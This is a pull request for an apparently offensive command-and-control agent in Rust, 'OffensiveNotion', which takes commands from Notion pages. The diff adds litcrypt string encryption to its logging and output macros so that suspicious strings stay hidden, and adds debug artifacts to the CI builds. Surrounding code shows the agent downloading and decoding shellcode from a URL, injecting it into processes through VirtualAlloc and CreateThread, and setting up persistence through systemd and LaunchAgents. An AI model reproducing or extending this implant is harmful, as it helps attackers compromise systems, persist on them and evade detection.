### PR TITLE
Encryption Returns!

### DIFF
--- a/.github/workflows/rust.yml
+++ b/.github/workflows/rust.yml
@@ -18,7 +18,17 @@ jobs:
     - uses: actions/checkout@v2
     - name: Update Rust
       run: rustup update stable
-    - name: Build 
+    - name: Build Debug
+      working-directory: ./agent
+      run: cargo build
+      env:
+        LITCRYPT_ENCRYPT_KEY: offensivenotion
+    - name: Upload artifact
+      uses: actions/upload-artifact@v2
+      with:
+        name: offensive_notion_linux_amd64_debug 
+        path: agent/target/debug/offensive_notion
+    - name: Build Release
       working-directory: ./agent
       run: cargo build --release
       env:
@@ -39,9 +49,17 @@ jobs:
       run: rustup update stable
     - name: Add macOS Triple
       run: rustup target add x86_64-pc-windows-gnu 
-    - name: Set LitCrypt Key
-      run: export LITCRYPT_ENCRYPT_KEY="offensivenotion"
-    - name: Build 
+    - name: Build Debug
+      working-directory: ./agent
+      run: cargo build
+      env:
+        LITCRYPT_ENCRYPT_KEY: offensivenotion
+    - name: Upload artifact
+      uses: actions/upload-artifact@v2
+      with:
+        name: offensive_notion_darwin_amd64_debug 
+        path: agent/target/x86_64-apple-darwin/debug/offensive_notion
+    - name: Build Release
       working-directory: ./agent
       run: cargo build --release --target x86_64-apple-darwin
       env:
@@ -64,7 +82,17 @@ jobs:
       run: sudo apt install -y mingw-w64
     - name: Add Windows Triple
       run: rustup target add x86_64-pc-windows-gnu 
-    - name: Build 
+    - name: Build Debug
+      working-directory: ./agent
+      run: cargo build --target x86_64-pc-windows-gnu
+      env:
+        LITCRYPT_ENCRYPT_KEY: offensivenotion
+    - name: Upload artifact
+      uses: actions/upload-artifact@v2
+      with:
+        name: offensive_notion_win_64_debug.exe
+        path: agent/target/x86_64-pc-windows-gnu/debug/offensive_notion
+    - name: Build Release
       working-directory: ./agent
       run: cargo build --release --target x86_64-pc-windows-gnu
       env:

--- a/agent/Cargo.lock
+++ b/agent/Cargo.lock
@@ -452,6 +452,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "eef78b64d87775463c549fbd80e19249ef436ea3bf1de2a1eb7e717ec7fab1e9"
 
 [[package]]
+name = "litcrypt"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5f82f92066d9d41b3a569b459b7874e67feb835507a83b7bd142ea9f56c620c7"
+dependencies = [
+ "proc-macro2",
+ "quote",
+]
+
+[[package]]
 name = "lock_api"
 version = "0.4.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -596,6 +606,7 @@ dependencies = [
  "is-root",
  "kernel32-sys",
  "libc",
+ "litcrypt",
  "rand",
  "reqwest",
  "serde",

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -19,6 +19,7 @@ rand = "0.8.0"
 is-root = "0.1.2"
 base64 = "0.13.0"
 cidr-utils = "0.5.5"
+litcrypt = "0.3"
 
 [build-dependencies]
 embed-resource = "1.6"

--- a/agent/src/cmd/cd.rs
+++ b/agent/src/cmd/cd.rs
@@ -1,6 +1,7 @@
 use std::error::Error;
 use std::path::Path;
 use std::env::set_current_dir;
+use litcrypt::lc;
 use crate::cmd::{CommandArgs, notion_out};
 
 /// Changes the directory using system tools
@@ -9,7 +10,7 @@ pub fn handle(cmd_args: &mut CommandArgs) -> Result<String, Box<dyn Error>> {
     let path_arg = cmd_args.nth(0).unwrap_or_else(|| ".".to_string());
     let new_path = Path::new(&path_arg);
     match set_current_dir(new_path) {
-        Ok(_) => notion_out!("Changed to {path_arg}"),
+        Ok(_) => notion_out!("Changed to ", &path_arg),
         Err(e) => Ok(format!("{e}"))
     }
 }

--- a/agent/src/cmd/download.rs
+++ b/agent/src/cmd/download.rs
@@ -1,7 +1,8 @@
 use std::error::Error;
 use std::io::copy;
-use reqwest::Client;
 use std::fs::File;
+use reqwest::Client;
+use litcrypt::lc;
 use crate::cmd::{CommandArgs, notion_out};
 use crate::logger::{Logger, log_out};
 
@@ -21,7 +22,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
     if r.status().is_success() {
         if let Ok(mut out_file) = File::create(&path) {
             match copy(&mut r.bytes().await?.as_ref(), &mut out_file) {
-                Ok(b)  => { return Ok(format!("{b} bytes written to {path}"));},
+                Ok(b)  => { return notion_out!("File written to ", &path);},
                 Err(_) => { return notion_out!("Could not write file"); }
             }
         } else {

--- a/agent/src/cmd/elevate.rs
+++ b/agent/src/cmd/elevate.rs
@@ -5,6 +5,7 @@ use crate::config::ConfigOptions;
 use crate::cmd::{CommandArgs, notion_out};
 use std::env::args;
 use std::process::Command;
+use litcrypt::lc;
 #[cfg(windows)] use std::env::{var};
 #[cfg(windows)] use std::fs::copy as fs_copy;
 #[cfg(windows)] use crate::cmd::getprivs::is_elevated;

--- a/agent/src/cmd/getprivs.rs
+++ b/agent/src/cmd/getprivs.rs
@@ -1,5 +1,6 @@
 use std::error::Error;
 use is_root::is_root;
+use litcrypt::lc;
 use crate::cmd::notion_out;
 
 #[cfg(windows)] use std::ptr::null_mut;
@@ -53,7 +54,5 @@ pub fn is_elevated() -> bool {
 pub async fn handle() -> Result<String, Box<dyn Error>> {
     // TODO: Implement Linux check
     let is_admin = is_elevated();  
-    println!("{}", is_admin);
-    Ok(format!("Admin Context: {is_admin}"))
-    
+    notion_out!("Admin Context: ", &is_admin.to_string())  
 }

--- a/agent/src/cmd/inject.rs
+++ b/agent/src/cmd/inject.rs
@@ -1,7 +1,7 @@
-use litcrypt::lc;
 use std::error::Error;
-use crate::logger::Logger;
+use crate::logger::{Logger, log_out};
 use crate::cmd::{CommandArgs, notion_out};
+use litcrypt::lc;
 
 use base64::decode as b64_decode;
 #[cfg(windows)] extern crate winapi;
@@ -24,11 +24,11 @@ use base64::decode as b64_decode;
 #[cfg(windows)] use std::ptr;
 use reqwest::Client;
 
-async fn decode_shellcode(sc: String, b64_iterations: u32, logger: &Logger) -> Result<Vec<u8>, &str> {
-    logger.debug("Starting shellcode debug".to_string());
+async fn decode_shellcode(sc: String, b64_iterations: u32, logger: &Logger) -> Result<Vec<u8>, String> {
+    logger.debug(log_out!("Starting shellcode debug"));
     let mut shellcode_vec = Vec::from(sc.trim().as_bytes());
     for i in 0..b64_iterations {
-        logger.debug(format!("Decode iteration: {i}"));
+        logger.debug(log_out!("Decode iteration: ", &i.to_string()));
         match b64_decode(shellcode_vec) {
             Ok(d) => {
                 shellcode_vec = d
@@ -38,8 +38,8 @@ async fn decode_shellcode(sc: String, b64_iterations: u32, logger: &Logger) -> R
             },
             Err(e) => { 
                 let err_msg = e.to_string();
-                logger.err(format!("{}", err_msg.to_owned()));
-                return Err("Could not decode shellcode"); 
+                logger.err(err_msg.to_owned());
+                return Err(err_msg.to_owned()); 
             }
         };
     }
@@ -49,18 +49,18 @@ async fn decode_shellcode(sc: String, b64_iterations: u32, logger: &Logger) -> R
 
 /// Handles the retrieval and deobfuscation of shellcode from a url.
 
-async fn get_shellcode(url: String, b64_iterations: u32, logger: &Logger) -> Result<Vec<u8>, &str> {
+async fn get_shellcode(url: String, b64_iterations: u32, logger: &Logger) -> Result<Vec<u8>, String> {
     // Download shellcode, or try to
     let client = Client::new();
     if let Ok(r) = client.get(url).send().await {
         if r.status().is_success() {   
-            logger.info(format!("Downloaded shellcode")); 
+            logger.info(log_out!("Downloaded shellcode")); 
             // Get the shellcode. Now we have to decode it
             let shellcode_decoded: Vec<u8>;
             let shellcode_final_vec: Vec<u8>;
             if let Ok(sc) = r.text().await {
-                logger.info(format!("Got encoded bytes"));
-                logger.debug(format!("Encoded shellcode length: {}", sc.len()));
+                logger.info(log_out!("Got encoded bytes"));
+                logger.debug(log_out!("Encoded shellcode length: ", &sc.len().to_string()));
                 match decode_shellcode(sc, b64_iterations, logger).await {
                     Ok(scd) => { shellcode_decoded = scd; },
                     Err(e)  => { return Err(e); }
@@ -74,9 +74,9 @@ async fn get_shellcode(url: String, b64_iterations: u32, logger: &Logger) -> Res
                     if let Ok(s) = String::from_utf8(shellcode_decoded) {
                         shellcode_string = s;
                     } else {
-                        let err_msg = "Could not convert shellcode bytes to string";
-                        logger.err(err_msg.to_string());
-                        return Err("Could not convert shellcode bytes to string");
+                        let err_msg = lc!("Could not convert bytes to string");
+                        logger.err(err_msg.to_owned());
+                        return Err(err_msg.to_owned());
                     }                    
                     // At this point, we have the comma-separated "0xNN" form of the shellcode.
                     // We need to get each one until a proper u8.
@@ -103,17 +103,17 @@ async fn get_shellcode(url: String, b64_iterations: u32, logger: &Logger) -> Res
                 return Ok(shellcode_final_vec);
 
             } else {
-                let err_msg = "Could not decode shellcode";
-                logger.err(err_msg.to_string());
-                return Err(err_msg);
+                let err_msg = lc!("Could not decode shellcode");
+                logger.err(err_msg.to_owned());
+                return Err(err_msg.to_owned());
             }
 
         } else {
-            return Err("Could not download shellcode");
+            return Err(r.text().await.unwrap());
         }   
 
     } else {
-        return Err("Could not download shellcode");
+        return Err(lc!("Could not download shellcode"));
     }
 } 
 
@@ -146,7 +146,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
         // Get URL
         match cmd_args.nth(0) {
             Some(u) => { 
-                logger.debug(format!("Shellcode URL: {}", &u));
+                logger.debug(log_out!("Shellcode URL: ", &u));
                 url = u; 
             },
             None    => { return notion_out!("Could not parse URL"); }
@@ -179,7 +179,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                 match cmd_args.nth(0) {
                     Some(ps) => {
                         if let Ok(p) = ps.parse::<u32>() {
-                            logger.debug(format!("Injecting into PID: {:?}", &p));
+                            logger.debug(log_out!("Injecting into PID: ", &p.to_string()));
                             pid = p;
                             // Big thanks to trickster0
                             // https://github.com/trickster0/OffensiveRust/tree/master/Process_Injection_CreateThread
@@ -193,15 +193,15 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                             }
                             return notion_out!("Injection completed!");
                         } else {
-                            let err_msg = "Could not parse PID";
-                            logger.err(err_msg.to_string());
-                            return Ok(err_msg.to_string());
+                            let err_msg = lc!("Could not parse PID");
+                            logger.err(err_msg.to_owned());
+                            return Ok(err_msg.to_owned());
                         }
                     },
                     None => { 
-                        let err_msg = "Could not extract PID";
-                        logger.err(err_msg.to_string());
-                        return Ok(err_msg.to_string()); 
+                        let err_msg = lc!("Could not extract PID");
+                        logger.err(err_msg.to_owned());
+                        return Ok(err_msg.to_owned()); 
                     }
                 };
             },
@@ -215,7 +215,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                     Err(e) => { return Ok(e.to_string()) }
                 };
 
-                logger.debug(format!("Injecting into current process..."));
+                logger.debug(log_out!("Injecting into current process..."));
                 unsafe {
                     let base_addr = kernel32::VirtualAlloc(
                         ptr::null_mut(),
@@ -225,18 +225,18 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
                     );
 
                     if base_addr.is_null() {
-                        logger.err("Couldn't allocate memory to current proc.".to_string())
+                        logger.err(log_out!("Couldn't allocate memory to current proc."));
                     } else {
-                        logger.debug("Allocated memory to current proc.".to_string());
+                        logger.debug(log_out!("Allocated memory to current proc."));
                     }
 
                     // copy shellcode into mem
-                    logger.debug("Copying Shellcode to address in current proc.".to_string());
+                    logger.debug(log_out!("Copying Shellcode to address in current proc."));
                     std::ptr::copy(shellcode.as_ptr() as _, base_addr, shellcode.len());
-                    logger.debug("Copied...".to_string());
+                    logger.debug(log_out!("Copied..."));
 
                     // Flip mem protections from RW to RX with VirtualProtect. Dispose of the call with `out _`
-                    logger.debug("Changing mem protections to RX...".to_string());
+                    logger.debug(log_out!("Changing mem protections to RX..."));
 
                     let mut old_protect: DWORD = PAGE_READWRITE;
 
@@ -249,11 +249,11 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
 
                     if mem_protect == 0 {
                         //let error = errhandlingapi::GetLastError();
-                        return Ok(format!("Error during injection"));
+                        return notion_out!("Error during injection");
                     }
 
                     // Call CreateThread
-                    logger.debug("Calling CreateThread...".to_string());
+                    logger.debug(log_out!("Calling CreateThread..."));
 
                     let mut tid = 0;
                     let ep: extern "system" fn(PVOID) -> u32 = { std::mem::transmute(base_addr) };
@@ -269,9 +269,9 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
 
                     if h_thread.is_null() {
                         //let error = unsafe { errhandlingapi::GetLastError() };
-                        logger.err(format!("Error during inject."));
+                        logger.err(log_out!("Error during inject."));
                     } else {
-                        logger.info(format!("Thread Id: {tid}"));
+                        logger.info(log_out!("Thread Id: ", &tid.to_string()));
                     }
 
                     // CreateThread is not a blocking call, so we wait on the thread indefinitely with WaitForSingleObject. This blocks for as long as the thread is running

--- a/agent/src/cmd/inject.rs
+++ b/agent/src/cmd/inject.rs
@@ -1,3 +1,4 @@
+use litcrypt::lc;
 use std::error::Error;
 use crate::logger::Logger;
 use crate::cmd::{CommandArgs, notion_out};

--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -33,9 +33,12 @@ macro_rules! notion_out {
     ($s:tt) => {{
         Ok(lc!($s))
     }};
-    ($s:tt, $e:expr) => {{
+    ($s:tt, $($e:expr),*) => {{
         let mut res = lc!($s);
-        res.push_str($e);
+        $(
+            res.push(' ');
+            res.push_str($e);
+        )*
         Ok(res)
     }}
     

--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -4,7 +4,7 @@ use std::iter::Iterator;
 use std::result::Result;
 use core::str::Split;
 use std::fmt;
-// Local imports
+// External imports
 use crate::config::ConfigOptions;
 use crate::logger::Logger;
 // Command modules
@@ -27,13 +27,17 @@ mod unknown;
 mod selfdestruct;
 
 
+/// Uses litcrypt to encrypt output strings
+/// and create `Ok(String)` output
 macro_rules! notion_out {
-    ($s:literal) => {
-        Ok(format!($s))
-    };
-    ($s:literal, $e:ident) => {
-        Ok(format!($s, $e))
-    }
+    ($s:tt) => {{
+        Ok(lc!($s))
+    }};
+    ($s:tt, $e:expr) => {{
+        let mut res = lc!($s);
+        res.push_str($e);
+        Ok(res)
+    }}
     
 }
 pub(crate) use notion_out;

--- a/agent/src/cmd/persist.rs
+++ b/agent/src/cmd/persist.rs
@@ -235,7 +235,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
             "service" => {
                 if is_root() {
                     match create_dir(&app_dir) {
-                        Ok(_) => { logger.info(format!("Notion directory created")); },
+                        Ok(_) => { logger.info(log_out!("Notion directory created")); },
                         Err(e) => { logger.err(e.to_string()); }
                     };    
                     if let Ok(_) = copy(&app_path, &dest_path) {

--- a/agent/src/cmd/persist.rs
+++ b/agent/src/cmd/persist.rs
@@ -1,3 +1,4 @@
+use litcrypt::lc;
 use std::error::Error;
 use std::env::{var, args};
 use is_root::is_root;
@@ -258,7 +259,7 @@ WantedBy=multi-user.target"
 );
                         write(svc_path, svc_string)?;
                         let mut systemd_args = CommandArgs::from_string(
-                            "systemctl enable notion.service".to_string()
+                            lc!("systemctl enable notion.service")
                         );
                         return shell::handle(&mut systemd_args).await;
                     } else {
@@ -314,7 +315,7 @@ WantedBy=multi-user.target"
                     let b64_config = config_options.to_base64();
                     let launch_agent_dir: String;
                     if is_root() {
-                        launch_agent_dir = "/Library/LaunchAgents".to_string();
+                        launch_agent_dir = lc!("/Library/LaunchAgents");
                     } else {
                         launch_agent_dir = format!("{home}/Library/LaunchAgents");
                     }

--- a/agent/src/cmd/portscan.rs
+++ b/agent/src/cmd/portscan.rs
@@ -98,7 +98,7 @@ async fn scan_target(target: IpAddr, port: u16, timeout: u64) -> Result<String, 
     let socket_address = SocketAddr::new(target.clone(), port);
 
     match tokio::time::timeout(timeout, TcpStream::connect(&socket_address)).await {
-        Ok(Ok(_)) => Ok(format!("[+] {port} is open on host {target}")),
+        Ok(Ok(_)) => Ok(format!("{port} is open on host {target}")),
         _ => Ok("".to_string())
     }
 }

--- a/agent/src/cmd/portscan.rs
+++ b/agent/src/cmd/portscan.rs
@@ -6,6 +6,7 @@ use std::{
 use cidr_utils::cidr::IpCidr;
 use tokio::net::TcpStream;
 use tokio::sync::mpsc::channel;
+use litcrypt::lc;
 use crate::logger::{Logger};
 use crate::cmd::{CommandArgs, notion_out};
 
@@ -126,10 +127,10 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger) -> Result<Strin
     let args: Vec<String> = cmd_args.collect();
 
     if args.len() <= 4 {
-        Ok(format!("[-] Improper args.
+        notion_out!("[-] Improper args.
         [*] Usage: portscan [ip] [true/false] [concurrency] [timeout]
         [*] Example: portscan 192.168.35.5 false 10 0 🎯"
-        ))
+        )
     } else {
 
         let target: ScanTarget = eval_target(args[0].to_string()).await;

--- a/agent/src/cmd/runas.rs
+++ b/agent/src/cmd/runas.rs
@@ -1,4 +1,5 @@
 use std::error::Error;
+use litcrypt::lc;
 use crate::cmd::{CommandArgs, notion_out};
 
 /// Runs given command as another user. Requires admin privs.

--- a/agent/src/cmd/save.rs
+++ b/agent/src/cmd/save.rs
@@ -1,6 +1,7 @@
 use std::error::Error;
 use std::fs::write;
 use serde_json::to_string as json_to_string;
+use litcrypt::lc;
 // use relative_path::RelativePath;
 use crate::cmd::{CommandArgs, ConfigOptions, notion_out};
 

--- a/agent/src/cmd/selfdestruct.rs
+++ b/agent/src/cmd/selfdestruct.rs
@@ -1,6 +1,7 @@
 use std::error::Error;
 use std::env::args;
 use std::fs::remove_file;
+use litcrypt::lc;
 #[cfg(windows)] use houdini;
 #[cfg(windows)] use rand::{thread_rng, Rng};
 #[cfg(windows)] use rand::distributions::Alphanumeric;

--- a/agent/src/cmd/shell.rs
+++ b/agent/src/cmd/shell.rs
@@ -2,6 +2,7 @@ use std::process::Command;
 use std::error::Error;
 use crate::cmd::CommandArgs;
 
+
 /// Executes the given shell command.
 /// 
 /// On Windows, calls out to `cmd.exe`.

--- a/agent/src/cmd/shutdown.rs
+++ b/agent/src/cmd/shutdown.rs
@@ -1,4 +1,5 @@
 use std::error::Error;
+use litcrypt::lc;
 use crate::cmd::notion_out;
 
 /// Kills the agent.

--- a/agent/src/cmd/sleep.rs
+++ b/agent/src/cmd/sleep.rs
@@ -1,4 +1,5 @@
 use std::error::Error;
+use litcrypt::lc;
 use crate::cmd::{CommandArgs, ConfigOptions, notion_out};
 
 /// Modifies the sleep and jitter times
@@ -17,5 +18,5 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
         .unwrap_or_else(|_| config_options.jitter_time);
     config_options.sleep_interval = sleep_interval;
     config_options.jitter_time = jitter_time;
-    notion_out!("[+] Sleep time: {sleep_interval}, Jitter time: {jitter_time}")
+    notion_out!("[+] Sleep time / Jitter time: ", &format!("{sleep_interval} / {jitter_time}"))
 }

--- a/agent/src/cmd/unknown.rs
+++ b/agent/src/cmd/unknown.rs
@@ -1,4 +1,5 @@
 use std::error::Error;
+use litcrypt::lc;
 use crate::cmd::notion_out;
 
 /// Handles any weirdo commands that can't be interpreted.

--- a/agent/src/config.rs
+++ b/agent/src/config.rs
@@ -5,6 +5,7 @@ use std::fmt;
 use serde::{Deserialize, Serialize};
 use serde_json::{Value, to_string, to_value};
 use base64::encode;
+use litcrypt::lc;
 
 // Config consts
 pub const URL_BASE: &str = "https://api.notion.com/v1";
@@ -158,7 +159,13 @@ pub async fn load_config_options(c: Option<&str>) -> Result<ConfigOptions, Confi
         if let Ok(cfg) = serde_json::from_str(c.as_str()) {
             Ok(ConfigOptions::from_json(cfg))
         } else {
-            println!("[!] Could not convert {c} to JSON");
+
+            // Create ad-hoc encryption since we don't have a logger
+            #[cfg(debug_assertions)] {
+                let mut err_msg = lc!("[!] Could not convert to JSON: ");
+                err_msg.push_str(c.as_str());
+                println!("{err_msg}");
+            }
             get_config_options().await
         }
     } else {

--- a/agent/src/logger.rs
+++ b/agent/src/logger.rs
@@ -73,9 +73,17 @@ impl Logger {
 }
 
 macro_rules! log_out {
-    ($s:literal) => {
-        format!($s)
+    ($s:tt) => {
+        lc!($s)
     };
+    ($s:tt, $($e:expr),*) => {{
+        let mut res = lc!($s);
+        $(
+            res.push(' ');
+            res.push_str($e);
+        )*
+        res
+    }}
     
 }
 pub(crate) use log_out;

--- a/agent/src/logger.rs
+++ b/agent/src/logger.rs
@@ -1,3 +1,5 @@
+use litcrypt::lc;
+
 pub const LOG_DEBUG: u64 = 5;
 pub const LOG_INFO: u64  = 4;
 pub const LOG_WARN: u64  = 3;
@@ -25,17 +27,16 @@ impl Logger {
 
     /// The actual function that logs to stdout
     pub fn log(&self, log_level: LogLevel, msg: String) {
-        let log_glyph = match log_level {
-            LOG_DEBUG => "[?]",
-            LOG_INFO  => "[+]",
-            LOG_WARN  => "[-]",
-            LOG_ERR   => "[*]",
-            LOG_CRIT  => "[!]",
-            _        => ""
+        let mut log_msg: String = match log_level {
+            LOG_DEBUG => lc!("[?] "),
+            LOG_INFO  => lc!("[+] "),
+            LOG_WARN  => lc!("[-] "),
+            LOG_ERR   => lc!("[*] "),
+            LOG_CRIT  => lc!("[!] "),
+            _        => "".to_string(),
         };
-        let mut log_msg = String::from(log_glyph);
         log_msg.push_str(msg.as_str());
-        println!("{log_glyph} {msg}");
+        println!("{log_msg}");
         
     }
 

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -4,7 +4,6 @@ extern crate tokio;
 extern crate serde_json;
 extern crate whoami;
 extern crate base64;
-#[macro_use]
 extern crate litcrypt;
 
 use std::{thread, time};

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -4,7 +4,8 @@ extern crate tokio;
 extern crate serde_json;
 extern crate whoami;
 extern crate base64;
-
+#[macro_use]
+extern crate litcrypt;
 
 use std::{thread, time};
 use std::env::args;
@@ -16,6 +17,7 @@ use whoami::hostname;
 use reqwest::Client;
 use reqwest::header::{HeaderMap, AUTHORIZATION, CONTENT_TYPE};
 use base64::decode;
+use litcrypt::{lc, use_litcrypt};
 
 mod config;
 use config::{
@@ -32,11 +34,12 @@ mod cmd;
 use cmd::{NotionCommand, CommandType};
 mod logger;
 
+use_litcrypt!();
 
 #[tokio::main]
 async fn main() -> Result<(), Box<dyn std::error::Error>> {
     
-    println!("[*] Starting!");
+    println!("{}", lc!("[*] Starting!"));
     
     // Handle config options
     let mut config_options: ConfigOptions;
@@ -76,18 +79,18 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
 
     // Start Notion App if configured to do so
     if config_options.launch_app {
-        logger.info("Launching app".to_string());
-        let browser_cmd: &str;
+        logger.info(lc!("Launching app"));
+        let browser_cmd: String;
         #[cfg(windows)] {
-            browser_cmd = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe";
+            browser_cmd = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".to_string();
         }
         #[cfg(not(windows))] {
-            browser_cmd = "/usr/local/bin/google-chrome";
+            browser_cmd = lc!("/usr/local/bin/google-chrome");
         }
         match Command::new(browser_cmd)
         .arg("--app=https://notion.so")
         .spawn() {
-            Ok(_) => {logger.info("Launching browser".to_string());},
+            Ok(_) => {logger.info(lc!("Launching browser"));},
             Err(e) => {logger.err(e.to_string());}
         };
     }

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -32,6 +32,7 @@ use notion::{get_blocks, complete_command, create_page, send_result};
 mod cmd;
 use cmd::{NotionCommand, CommandType};
 mod logger;
+use logger::log_out;
 
 use_litcrypt!();
 
@@ -78,7 +79,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
 
     // Start Notion App if configured to do so
     if config_options.launch_app {
-        logger.info(lc!("Launching app"));
+        logger.info(log_out!("Launching app"));
         let browser_cmd: String;
         #[cfg(windows)] {
             browser_cmd = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".to_string();
@@ -105,7 +106,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
         hn.push_str("*");
     }
 
-    logger.info(format!("Hostname: {hn}"));
+    logger.info(log_out!("Hostname: ", &hn));
     logger.debug(format!("Config options: {:?}", config_options));
 
     let mut headers = HeaderMap::new();
@@ -140,7 +141,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
             match block["to_do"]["text"][0]["text"]["content"].as_str() {
                 Some(s) => {
                     if s.contains("🎯") {
-                        logger.info(format!("Got command: {s}"));
+                        logger.info(log_out!("Got command: ", s));
                         let mut notion_command = NotionCommand::from_string(s.replace("🎯",""))?;
                         let output = notion_command.handle(&mut config_options, &logger).await?;
                         let command_block_id = block["id"].as_str().unwrap();
@@ -167,7 +168,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
             time::Duration::from_secs(config_options.sleep_interval + jitter_time);
 
         thread::sleep(sleep_time);
-        logger.info(format!("zzzZZZzzz: {} seconds", config_options.sleep_interval));
-        logger.debug(format!("Jitter: {}", config_options.jitter_time));
+        logger.info(log_out!("zzzZZZzzz: ", &config_options.sleep_interval.to_string(), "seconds"));
+        logger.debug(log_out!("Jitter: ", &config_options.jitter_time.to_string()));
     }
 }


### PR DESCRIPTION
Okay, finally got this sorted! `notion_out!` and `log_out!` macros will encrypt string literals before use. This changes up some of the ergonomics, but ultimately it's not so bad.  `notion_out!` and `log_out!` can take arbitrary dynamic arguments after the initial string literal. So for instance,

```rust
log_out!("I am encrypted, but these are not: ", "random", "data", "here")
```
This is how we can handle encrypting the suspicious message strings, but still provide dynamic data. It constrains our syntax a little, (dynamic data in messages has to be at the end—see `sleep.rs` for an example), but ultimately the benefits far outweigh the constraint.

Oh also, this PR includes the addition of debug artifacts to the Actions workflow.